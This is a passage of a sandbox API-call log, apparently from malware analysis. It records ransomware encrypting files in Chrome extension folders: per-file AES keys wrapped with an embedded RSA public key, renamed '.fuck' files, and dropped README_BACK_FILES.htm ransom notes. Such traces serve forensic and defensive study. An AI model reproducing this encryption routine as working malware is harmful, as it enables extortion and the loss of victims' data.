out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0xf0) returned 1 [0252.640] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0xf0, lpOverlapped=0x0) returned 1 [0252.640] CloseHandle (hObject=0x5d60) returned 1 [0252.641] CloseHandle (hObject=0x5d64) returned 1 [0252.641] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json"), bFailIfExists=0) returned 1 [0252.644] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json", dwFileAttributes=0x0) returned 1 [0252.644] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.gsg")) returned 1 [0252.646] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.fuck")) returned 1 [0252.647] CryptDestroyHash (hHash=0x2985ba0) returned 1 [0252.647] CryptDestroyKey (hKey=0x2984760) returned 1 [0252.647] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.647] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0252.647] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.647] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\readme_back_files.htm")) returned 0xffffffff [0252.647] AreFileApisANSI () returned 1 [0252.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0252.648] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0252.648] GetFileType (hFile=0x5d50) returned 0x1 [0252.648] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0252.649] FindNextFileA (in: hFindFile=0x2985f20, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0 [0252.650] FindClose (in: hFindFile=0x2985f20 | out: hFindFile=0x2985f20) returned 1 [0252.650] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\readme_back_files.htm")) returned 0xffffffff [0252.650] AreFileApisANSI () returned 1 [0252.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x299a140, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 143 [0252.650] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d604, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0252.651] GetFileType (hFile=0x5d4c) returned 0x1 [0252.652] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9c250*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c248, lpOverlapped=0x0 | out: lpBuffer=0x2b9c250*, lpNumberOfBytesWritten=0x2b9c248*=0x5ec, lpOverlapped=0x0) returned 1 [0252.653] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0252.653] FindClose (in: hFindFile=0x2985ea0 | out: hFindFile=0x2985ea0) returned 1 [0252.653] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\readme_back_files.htm")) returned 0xffffffff [0252.653] AreFileApisANSI () returned 1 [0252.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x299a140, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 135 [0252.653] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0252.655] GetFileType (hFile=0x5d40) returned 0x1 [0252.655] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0252.656] FindNextFileA (in: hFindFile=0x29388b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0252.656] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x2985f20 [0252.657] FindNextFileA (in: hFindFile=0x2985f20, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0252.657] FindNextFileA (in: hFindFile=0x2985f20, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0252.657] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\*.*", lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0x2985ea0 [0252.669] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0252.669] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0252.669] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0252.669] GetLastError () returned 0x0 [0252.669] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png")) returned 0x20 [0252.670] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png", dwFileAttributes=0x80) returned 1 [0252.670] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0252.671] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.672] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.gsg", dwFileAttributes=0x2) returned 1 [0252.673] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x298a040) returned 1 [0252.675] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0252.675] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.675] CryptHashData (hHash=0x2985a20, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.675] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x2985a20, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x29846a0) returned 1 [0252.675] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.675] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0252.675] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x298d450) returned 1 [0252.676] CryptImportPublicKeyInfo (in: hCryptProv=0x298d450, dwCertEncodingType=0x1, pInfo=0x2992df0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2992e20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2992e28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2984760) returned 1 [0252.676] CryptEncrypt (in: hKey=0x2984760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0252.676] CryptEncrypt (in: hKey=0x2984760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298cd68*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x298cd68*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0252.676] WriteFile (in: hFile=0x5d64, lpBuffer=0x298cd68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x298cd68*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0252.677] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0252.703] CryptEncrypt (in: hKey=0x29846a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0252.703] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0252.714] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0252.714] CryptEncrypt (in: hKey=0x29846a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0252.714] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0252.714] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0252.714] CryptEncrypt (in: hKey=0x29846a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0252.714] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0252.714] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x2c7, lpOverlapped=0x0) returned 1 [0252.714] CryptEncrypt (in: hKey=0x29846a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x2c7, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x2d0) returned 1 [0252.714] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x2d0, lpOverlapped=0x0) returned 1 [0252.714] CloseHandle (hObject=0x5d50) returned 1 [0252.714] CloseHandle (hObject=0x5d64) returned 1 [0252.714] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png"), bFailIfExists=0) returned 1 [0252.718] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png", dwFileAttributes=0x0) returned 1 [0252.718] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.gsg")) returned 1 [0252.720] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.fuck")) returned 1 [0252.721] CryptDestroyHash (hHash=0x2985a20) returned 1 [0252.721] CryptDestroyKey (hKey=0x29846a0) returned 1 [0252.721] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.721] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0252.721] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0252.721] GetLastError () returned 0x0 [0252.721] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png")) returned 0x20 [0252.722] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png", dwFileAttributes=0x80) returned 1 [0252.723] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.723] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0252.724] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.gsg", dwFileAttributes=0x2) returned 1 [0252.724] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x298a040) returned 1 [0252.726] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0252.726] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0252.726] CryptHashData (hHash=0x2985a20, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.726] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x2985a20, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x29846a0) returned 1 [0252.727] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.727] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0252.727] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x298cdf0) returned 1 [0252.727] CryptImportPublicKeyInfo (in: hCryptProv=0x298cdf0, dwCertEncodingType=0x1, pInfo=0x29933a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29933d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29933d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2984e20) returned 1 [0252.727] CryptEncrypt (in: hKey=0x2984e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0252.727] CryptEncrypt (in: hKey=0x2984e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298cac0*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x298cac0*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0252.728] WriteFile (in: hFile=0x5d50, lpBuffer=0x298cac0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x298cac0*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0252.729] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x9d, lpOverlapped=0x0) returned 1 [0252.730] CryptEncrypt (in: hKey=0x29846a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x9d, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0xa0) returned 1 [0252.730] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0xa0, lpOverlapped=0x0) returned 1 [0252.730] CloseHandle (hObject=0x5d64) returned 1 [0252.731] CloseHandle (hObject=0x5d50) returned 1 [0252.731] CopyFileA 